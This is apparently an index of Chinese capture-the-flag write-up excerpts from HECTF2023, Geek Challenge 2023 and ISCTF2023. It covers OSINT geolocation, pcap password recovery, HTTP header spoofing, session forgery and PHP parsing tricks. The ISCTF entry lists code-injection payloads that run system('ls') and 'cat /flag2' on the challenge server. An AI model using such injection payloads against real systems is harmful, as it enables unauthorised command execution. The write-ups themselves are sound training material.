HECTF2023wp
Misc-签到&签退
Misc-osint
先搜酒店外景图,找到一张相似的,百度识图,河北邯郸市永年区,直接锁定永年太极广场
HECTF{河北省邯郸市永年区永年太极广场}
Misc-ezpacp
导出对象->http,发现不少东西,选择的是 /POST login,追踪http流,发现一段base64编码SEVMTE9IRUNURlgyejBVbTIzUkY=,解码得到,HELLOHECTFX2z0Um23RF,
追踪到一个
导出,加密了,试一下密码X2z0Um23RF,拿到flag
HECTF{euLpTT3DQWhvoHhwqmSxQdZHQFccHOlfk7WWbXlg}
Web-伪装者
首先是referer,其次是UA头,再是session伪造
先利用本地的sessions.py,解出
# kalipython3 sessions.py eyJrZXkiOiJ6eGsxaW5nIiwidXNlcm5hbWUiOiJqb2tlciJ9.ZVhPvg.6WsRkbssuzOuGgnG0G5Lqdqriqc{'key': ...
Geek Challenge 2023wp
WEB-easy_php
最后一步需要知道php的变量命名规则,还有就是变量名被解析到 [ 之后,会被替换成_,好像+也可以,然后后面的不规则命名会得以保存
WEB-EzHttp
Via头字段用于指定HTTP消息所途经的代理服务器所使用的协议和主机名称,可以指向代理服务器
php $_SERVER[‘HTTP_02TAKUXX’]函数用法 #当前请求的 02TAKUXX: 头部的内容
WEB-Puppy_rce
过滤且无参RCE
<?phphighlight_file(__FILE__);header('Content-Type: text/html; charset=utf-8');error_reporting(0);include(flag.php);//当前目录下有好康的😋if (isset($_GET['var']) && $_GET['var']) { $var = $_GET['var']; if (!preg_match(&quo ...
ISCTF2023
Web-where_is_the_flag
1=system("ls");
发现flag.php index.php
flag1: 1=show_source('flag.php');
1=system("ls /");
发现flag2
flag2: 1=system("cat /flag2");
1=phpinfo();
找到flag3
ISCTF{828b2469-d08d-4c48-930d-dbf5f6cbaeaa}
Web-绕进你心里
<?phphighlight_file(__FILE__);error_reporting(0);require 'flag.php';$str = (String)$_POST['pan_gu'];$num = $_GET['zhurong'];$lida1 = $_GET['hongmeng'];$lida2 = $_GET['shennong']; ...